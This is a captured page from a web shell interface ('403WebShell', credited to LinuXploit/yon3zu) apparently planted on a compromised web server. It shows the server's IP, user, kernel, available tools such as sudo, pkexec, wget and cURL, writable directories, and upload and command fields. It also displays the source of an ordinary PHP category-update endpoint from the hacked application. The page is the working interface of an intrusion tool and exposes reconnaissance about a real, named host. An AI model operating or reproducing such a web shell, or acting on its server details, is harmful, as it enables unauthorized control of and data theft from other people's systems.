Uname:Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64

403WebShell
403Webshell
Server IP : 3.111.61.48  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64
User : ubuntu ( 1000)
PHP Version : 8.2.31
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/vhost/itms.arukustech.com/public/api/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhost/itms.arukustech.com/public/api/category_update.php
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);

require_once __DIR__ . '/../../app/db.php';
require_once __DIR__ . '/../../app/helpers/auth.php';
check_login();

header("Content-Type: application/json");

// SECURITY: Verify user is SuperAdmin before allowing any changes
if ($_SESSION['role'] !== 'superadmin') {
    echo json_encode(["status" => "error", "message" => "Access denied. Only SuperAdmins can update category settings."]);
    exit;
}

$id = $_POST['id'] ?? null;
$name = trim($_POST['name'] ?? "");
$prefix = strtoupper(trim($_POST['asset_prefix'] ?? ""));
$next_number = intval($_POST['next_number'] ?? 0); 

if (!$id || $name == "" || $prefix == "" || $next_number <= 0) {
    echo json_encode(["status" => "error", "message" => "Missing or invalid fields"]);
    exit;
}

try {
    $pdo = db();

    // Updated SQL to include next_number
    $stmt = $pdo->prepare("
        UPDATE inv_categories 
        SET name = ?, asset_prefix = ?, next_number = ?
        WHERE id = ?
    ");

    $stmt->execute([$name, $prefix, $next_number, $id]);

    echo json_encode(["status" => "success"]);
} 
catch (PDOException $e) {
    echo json_encode(["status" => "error", "message" => $e->getMessage()]);
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit